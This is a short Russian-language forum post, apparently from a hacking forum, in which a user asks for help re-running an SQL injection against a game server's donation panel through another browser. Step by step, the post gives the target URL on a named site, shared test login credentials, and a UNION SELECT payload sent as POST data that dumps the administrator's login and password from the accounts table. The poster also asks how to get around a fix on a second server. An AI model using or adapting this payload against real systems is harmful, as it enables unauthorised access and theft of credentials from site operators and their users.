Помогите с SQL через POST data

Discussion in 'Болталка' started by n1k3, 13 Mar 2014.

  1. n1k3

    n1k3 New Member

    Joined:
    13 Nov 2013
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Привет! Нужно воспроизвести старую уязвимость донат панели только не через мазилу с хакбаром , показать другой способ аналогичный этому только в другом браузере,ну или подскажите что еще можно вытащить с этой панели)
    P.S. Есть такая же панель на другом сервере,но с мозилы не могу залогинится на нее, админ поставил фикс какой то,я в этом очень плохо разбираюсь,прошу у вас помощи желательно по подробнее,я в этом нуб!
    Буду очень признателен за помощь!

    ПАНЕЛЬ для теста
    акк:painel пасс:painel

    Опишу баг еще раз т.к. его удалили с форума.(для мазилы через хакбар)
    1. Логинимся в донат панель
    2. В верхнюю строчку Хакбара вставляем следущее : http://l2kof.net/donate/painel.php?page=comprar_item
    3. В Пост Дата вставляем : items[] =99999 union select 1,2,concat_ws(0x3a,login,password),4,5,6,7,0x69746 56D73 from accounts where access_level=1#
    4. В столбце Qtd получаем акк и пасс админа
     
Loading...
Similar Threads - Помогите POST data
  1. Turanchocks_
    Replies:
    2
    Views:
    1,561
  2. skillushqa_
    Replies:
    32
    Views:
    3,751